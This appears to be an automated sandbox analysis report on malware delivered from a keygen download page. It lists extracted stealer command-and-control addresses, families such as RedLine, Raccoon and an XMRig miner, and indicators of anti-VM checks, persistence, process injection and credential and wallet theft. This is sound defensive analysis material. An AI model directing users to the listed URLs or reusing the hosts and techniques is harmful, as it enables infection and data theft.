Resubmissions
22-04-2021 16:45
210422-k9xv9nxcbx 1021-04-2021 17:01
210421-pl1rqeqs7n 1021-04-2021 12:53
210421-gkr26l4mvs 1020-04-2021 19:55
210420-nex8ep6zhj 1020-04-2021 15:03
210420-v63pp18knj 10Analysis
-
max time kernel
1036s -
max time network
1798s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
20-04-2021 19:55
Static task
static1
URLScan task
urlscan1
Sample
https://keygenit.com/d/8550ceeb125094q2480.html
Behavioral task
behavioral1
Sample
https://keygenit.com/d/8550ceeb125094q2480.html
Resource
win10v20210410
Behavioral task
behavioral2
Sample
https://keygenit.com/d/8550ceeb125094q2480.html
Resource
win10v20210408
Behavioral task
behavioral3
Sample
https://keygenit.com/d/8550ceeb125094q2480.html
Resource
win7v20210410
Behavioral task
behavioral4
Sample
https://keygenit.com/d/8550ceeb125094q2480.html
Resource
win10v20210408
Behavioral task
behavioral5
Sample
https://keygenit.com/d/8550ceeb125094q2480.html
Resource
win10v20210410
General
-
Target
https://keygenit.com/d/8550ceeb125094q2480.html
-
Sample
210420-nex8ep6zhj
Malware Config
Extracted
raccoon
562d987fd49ccf22372ac71a85515b4d288facd7
-
url4cnc
https://telete.in/j90dadarobin
Extracted
fickerstealer
sodaandcoke.top:80
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 7144 created 6644 7144 svchost.exe app.exe -
fickerstealer
Ficker is an infostealer written in Rust and ASM.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
XMRig Miner Payload 1 IoCs
Processes:
resource yara_rule behavioral5/memory/5636-302-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Blocklisted process makes network request 7 IoCs
Processes:
msiexec.exemshta.exemshta.execmd.exeflow pid process 215 5636 msiexec.exe 681 5636 msiexec.exe 742 4516 mshta.exe 749 4700 mshta.exe 756 4700 mshta.exe 757 5604 cmd.exe 766 5604 cmd.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
Ultra.exeplayer_record_48792.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts Ultra.exe File opened for modification C:\Windows\system32\drivers\etc\hosts player_record_48792.exe -
Executes dropped EXE 64 IoCs
Processes:
keygen-pr.exekeygen-step-1.exekeygen-step-5.exekeygen-step-2.exekeygen-step-3.exekeygen-step-4.exePING.EXEkey.exeJoSetp.exe2130.tmp.exeuQLGv.exe5661775.exe3274620.exeaskinstall20.exeWindows Host.exeInstall.exeInstall.tmpUltra.exeultramediaburner.exeultramediaburner.tmpJaeqefaejisho.exeTugaeharuxae.exeUltraMediaBurner.exefilee.exe9892.tmp.exe9AF5.tmp.exejg6_6asg.exe9892.tmp.exekabo.exekabo.exeIrecCH6.exeIrecCH6.tmpplayer_record_48792.exeirecord.exeDywazhibyfa.exeirecord.tmpMaloxaeraeje.exegcttt.exei-record.exejfiag3g_gg.exejfiag3g_gg.exegaoou.exejfiag3g_gg.exegoogle-game.exemd1_1eaf.exey1.exebuild.exeaskinstall36.exeKiffApp2.exeGZWRMDJALF.exemain.exeABCbrowser.exetoolspab1.exeinst.exeiWlalmSunLabsPlayer.exeapp.exeVNrgBLtoolspab1.exeparse.exeparse.exeAddInProcess32.exe1109.exepid process 4788 keygen-pr.exe 4428 keygen-step-1.exe 4972 keygen-step-5.exe 4716 keygen-step-2.exe 632 keygen-step-3.exe 4080 keygen-step-4.exe 1868 PING.EXE 1580 key.exe 3784 JoSetp.exe 4544 2130.tmp.exe 4620 uQLGv.exe 3672 5661775.exe 2352 3274620.exe 4204 askinstall20.exe 2676 Windows Host.exe 4472 Install.exe 576 Install.tmp 1508 Ultra.exe 2096 ultramediaburner.exe 3972 ultramediaburner.tmp 4400 Jaeqefaejisho.exe 1288 Tugaeharuxae.exe 4300 UltraMediaBurner.exe 4832 filee.exe 4468 9892.tmp.exe 5196 9AF5.tmp.exe 5692 jg6_6asg.exe 5948 9892.tmp.exe 2208 kabo.exe 5020 kabo.exe 3300 IrecCH6.exe 5672 IrecCH6.tmp 6040 player_record_48792.exe 4736 irecord.exe 4328 Dywazhibyfa.exe 5724 irecord.tmp 5196 Maloxaeraeje.exe 5044 gcttt.exe 3184 i-record.exe 5944 jfiag3g_gg.exe 6396 jfiag3g_gg.exe 6696 gaoou.exe 6844 jfiag3g_gg.exe 6248 google-game.exe 6172 md1_1eaf.exe 4840 y1.exe 6184 build.exe 6680 askinstall36.exe 4868 KiffApp2.exe 4840 y1.exe 5212 GZWRMDJALF.exe 5600 main.exe 5504 ABCbrowser.exe 6356 toolspab1.exe 4836 inst.exe 5164 iWlalm 7120 SunLabsPlayer.exe 6644 app.exe 392 VNrgBL 1008 toolspab1.exe 3752 parse.exe 4012 parse.exe 4240 AddInProcess32.exe 5436 1109.exe -
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
15AB.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 15AB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 15AB.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Jaeqefaejisho.exekeygen-step-4.exeDywazhibyfa.exeE0C9.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Jaeqefaejisho.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation keygen-step-4.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Dywazhibyfa.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation E0C9.exe -
Loads dropped DLL 64 IoCs
Processes:
rundll32.exeregsvr32.exe2130.tmp.exeInstall.tmpkabo.exeIrecCH6.tmpi-record.exerundll32.exebuild.exemain.exey1.exeSunLabsPlayer.exetoolspab1.exeA7EF.exeDB5A.exebwfiwcdtffiwcdlighteningplayer.exepid process 904 rundll32.exe 4276 regsvr32.exe 4544 2130.tmp.exe 4544 2130.tmp.exe 4544 2130.tmp.exe 4544 2130.tmp.exe 4544 2130.tmp.exe 576 Install.tmp 5020 kabo.exe 5672 IrecCH6.tmp 3184 i-record.exe 3184 i-record.exe 3184 i-record.exe 3184 i-record.exe 3184 i-record.exe 3184 i-record.exe 3184 i-record.exe 3184 i-record.exe 6412 rundll32.exe 6184 build.exe 6184 build.exe 5600 main.exe 4840 y1.exe 7120 SunLabsPlayer.exe 4840 y1.exe 4840 y1.exe 4840 y1.exe 4840 y1.exe 1008 toolspab1.exe 7120 SunLabsPlayer.exe 7120 SunLabsPlayer.exe 7120 SunLabsPlayer.exe 7120 SunLabsPlayer.exe 7120 SunLabsPlayer.exe 7120 SunLabsPlayer.exe 7120 SunLabsPlayer.exe 7120 SunLabsPlayer.exe 7120 SunLabsPlayer.exe 5432 A7EF.exe 5432 A7EF.exe 5432 A7EF.exe 5432 A7EF.exe 5432 A7EF.exe 6364 DB5A.exe 6364 DB5A.exe 6364 DB5A.exe 6364 DB5A.exe 6364 DB5A.exe 6364 DB5A.exe 6380 bwfiwcd 6104 tffiwcd 576 lighteningplayer.exe 576 lighteningplayer.exe 576 lighteningplayer.exe 576 lighteningplayer.exe 576 lighteningplayer.exe 576 lighteningplayer.exe 576 lighteningplayer.exe 576 lighteningplayer.exe 576 lighteningplayer.exe 576 lighteningplayer.exe 576 lighteningplayer.exe 576 lighteningplayer.exe 576 lighteningplayer.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
player_record_48792.exegcttt.exe3274620.exeUltra.exe9AF5.tmp.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Portable Devices\\Tipitazhuly.exe\"" player_record_48792.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" gcttt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe" 3274620.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Internet Explorer\\Tejidulepae.exe\"" Ultra.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9AF5.tmp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\waupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\waupdat3.exe" 9AF5.tmp.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
jg6_6asg.exemd1_1eaf.exe15AB.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg6_6asg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md1_1eaf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 15AB.exe -
Drops Chrome extension 1 IoCs
Processes:
askinstall20.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\colgdlijdieibnaccfdcdbpdffofkfeb\6.37.18_0\manifest.json askinstall20.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 769 ip-api.com 216 api.ipify.org 312 ip-api.com -
Drops file in System32 directory 5 IoCs
Processes:
svchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\MJ2F0Y6L.cookie svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\MJ2F0Y6L.cookie svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 796235DDA6337515 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent FEE599F4A47AB97A svchost.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
regsvr32.exeregsvr32.exepid process 4276 regsvr32.exe 3656 regsvr32.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
Processes:
main.exeparse.exeparse.exeAddInProcess32.exe15AB.exepid process 5600 main.exe 5600 main.exe 5600 main.exe 5600 main.exe 5600 main.exe 5600 main.exe 3752 parse.exe 4012 parse.exe 4240 AddInProcess32.exe 4012 parse.exe 3752 parse.exe 4240 AddInProcess32.exe 6088 15AB.exe -
Suspicious use of SetThreadContext 32 IoCs
Processes:
svchost.exe9AF5.tmp.exe9892.tmp.exekabo.exeinst.exeiWlalmtoolspab1.exeABCbrowser.exeB2CE.exe647349126.exe1371397063.exeF86A.exe201.exeFF51.exeE0C9.exe742.exebwfiwcdtffiwcd201.exemshta.exe1371397063.exeF86A.exeConhost.exeFF51.exeA492.exe647349126.exe647349126.exeE0C9.exe647349126.exeE0C9.exedescription pid process target process PID 3328 set thread context of 4516 3328 svchost.exe svchost.exe PID 3328 set thread context of 5100 3328 svchost.exe svchost.exe PID 5196 set thread context of 5460 5196 9AF5.tmp.exe msiexec.exe PID 5196 set thread context of 5636 5196 9AF5.tmp.exe msiexec.exe PID 4468 set thread context of 5948 4468 9892.tmp.exe 9892.tmp.exe PID 2208 set thread context of 5020 2208 kabo.exe kabo.exe PID 4836 set thread context of 5164 4836 inst.exe iWlalm PID 5164 set thread context of 392 5164 iWlalm VNrgBL PID 6356 set thread context of 1008 6356 toolspab1.exe toolspab1.exe PID 5504 set thread context of 6480 5504 ABCbrowser.exe AddInProcess32.exe PID 4228 set thread context of 4240 4228 B2CE.exe AddInProcess32.exe PID 4120 set thread context of 4952 4120 647349126.exe AddInProcess32.exe PID 3080 set thread context of 5564 3080 1371397063.exe AddInProcess32.exe PID 5804 set thread context of 6736 5804 F86A.exe AddInProcess32.exe PID 5300 set thread context of 3656 5300 201.exe AddInProcess32.exe PID 4468 set thread context of 660 4468 FF51.exe AddInProcess32.exe PID 1484 set thread context of 5876 1484 E0C9.exe E0C9.exe PID 5924 set thread context of 6480 5924 742.exe 742.exe PID 3984 set thread context of 6380 3984 bwfiwcd bwfiwcd PID 4640 set thread context of 6104 4640 tffiwcd tffiwcd PID 5496 set thread context of 5264 5496 201.exe AddInProcess32.exe PID 4516 set thread context of 5604 4516 mshta.exe AddInProcess32.exe PID 4652 set thread context of 3960 4652 1371397063.exe AddInProcess32.exe PID 5728 set thread context of 4824 5728 F86A.exe AddInProcess32.exe PID 1908 set thread context of 5172 1908 Conhost.exe AddInProcess32.exe PID 5240 set thread context of 6604 5240 FF51.exe WerFault.exe PID 6064 set thread context of 6536 6064 A492.exe E0C9.exe PID 4552 set thread context of 1556 4552 647349126.exe AddInProcess32.exe PID 5896 set thread context of 4544 5896 647349126.exe AddInProcess32.exe PID 2344 set thread context of 5860 2344 E0C9.exe E0C9.exe PID 3932 set thread context of 2400 3932 647349126.exe AddInProcess32.exe PID 1980 set thread context of 5748 1980 E0C9.exe E0C9.exe -
Drops file in Program Files directory 64 IoCs
Processes:
SunLabsPlayer.exeultramediaburner.tmpirecord.tmpUltra.exeplayer_record_48792.exegoogle-game.exedescription ioc process File created C:\Program Files (x86)\lighteningplayer\plugins\access\libhttps_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_asf_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\cue.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\reader\filename.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\libvlc.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\mobile.css SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\koreus.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\soundcloud.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvc1_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\error_window.html SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\data_load.exe SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\libvlccore.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\UltraMediaBurner\is-TRHUA.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\recording\avutil-51.dll irecord.tmp File created C:\Program Files (x86)\recording\is-B3C5S.tmp irecord.tmp File created C:\Program Files (x86)\lighteningplayer\lua\intf\cli.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\vocaroo.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll SunLabsPlayer.exe File created C:\Program Files\Windows Security\LSUXGVCTMU\ultramediaburner.exe.config Ultra.exe File created C:\Program Files (x86)\lighteningplayer\plugins\logger\libconsole_logger_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\common.js SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\luac.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\simplexml.luac SunLabsPlayer.exe File created C:\Program Files\Windows Media Player\QJTSBSPREI\irecord.exe.config player_record_48792.exe File created C:\Program Files (x86)\lighteningplayer\libssp-0.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\youtube.luac SunLabsPlayer.exe File created C:\Program Files (x86)\recording\is-PFLOL.tmp irecord.tmp File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_mms_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\recording\is-IMJ4D.tmp irecord.tmp File created C:\Program Files (x86)\lighteningplayer\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\controllers.js SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libvcd_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files\install.dll google-game.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\librtp_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\view.html SunLabsPlayer.exe File created C:\Program Files (x86)\recording\is-CGNI6.tmp irecord.tmp File created C:\Program Files (x86)\recording\is-8UR5M.tmp irecord.tmp File created C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libvod_rtsp_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_h264_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\recording\avformat-53.dll irecord.tmp File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsdp_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\recording\unins000.dat irecord.tmp File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libmarq_plugin.dll SunLabsPlayer.exe -
Drops file in Windows directory 1 IoCs
Processes:
MicrosoftEdge.exedescription ioc process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 6720 4160 WerFault.exe MicrosoftEdgeCP.exe 5292 5568 WerFault.exe MicrosoftEdgeCP.exe 6604 6976 WerFault.exe MicrosoftEdgeCP.exe 7880 6960 WerFault.exe MicrosoftEdgeCP.exe 2952 7120 WerFault.exe SunLabsPlayer.exe -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
kabo.exetoolspab1.exebwfiwcdtffiwcddescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI kabo.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI kabo.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwfiwcd Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tffiwcd Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tffiwcd Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI kabo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwfiwcd Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwfiwcd Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tffiwcd Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
build.exesvchost.exesvchost.exe9892.tmp.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 9892.tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 9892.tmp.exe -
Delays execution with timeout.exe 6 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 4332 timeout.exe 2636 timeout.exe 5068 timeout.exe 860 timeout.exe 9796 timeout.exe 8064 timeout.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 8 IoCs
Processes:
chrome.exexcopy.exechrome.exexcopy.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Kills process with taskkill 13 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5200 taskkill.exe 4992 taskkill.exe 7836 taskkill.exe 6528 taskkill.exe 5476 taskkill.exe 1852 taskkill.exe 1208 taskkill.exe 6652 taskkill.exe 3024 taskkill.exe 4104 taskkill.exe 5996 taskkill.exe 5332 taskkill.exe 4236 taskkill.exe -
Processes:
MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Toolbar Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 -
Modifies data under HKEY_USERS 64 IoCs
Processes:
app.exesvchost.exesvchost.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local 